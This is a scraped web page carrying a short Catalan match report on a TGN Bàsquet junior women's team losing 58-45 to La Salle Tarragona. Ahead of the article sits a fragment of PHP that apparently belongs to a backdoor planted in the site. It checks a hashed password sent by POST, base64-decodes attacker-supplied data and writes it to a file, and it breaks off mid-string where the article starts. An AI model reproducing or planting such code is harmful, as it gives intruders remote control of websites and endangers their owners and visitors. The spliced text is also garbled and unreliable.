function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El júnior femení perd gas després del descans i cau contra la Salle Tarragona (58-45) - Tgn Bàsquet Club -

El júnior femení perd gas després del descans i cau contra la Salle Tarragona (58-45)

Updated: febrer 6, 2018

L’equip júnior femení va perdre a la pista de la Salle Tarragona. Malgrat la derrota, el conjunt lila va fer un partit molt sòlid però una davallada en el seu joc després del descans va precipitar la derrota. Així, amb un equip que comptava amb cinc jugadores cadet en les seves files per cobrir les nombroses baixes per lesió, el TGN Bàsquet va plantar cara fins al descans a còpia de defensa (18-18 al descans). Després de la mitja part, però, les locals van aprofitar una davallada del joc lila i van obrir forat. Les visitants es van refer momentàniament però van pagar l’esforç i van acabar encaixant una derrota més àmplia del que s’havia vist sobre la pista.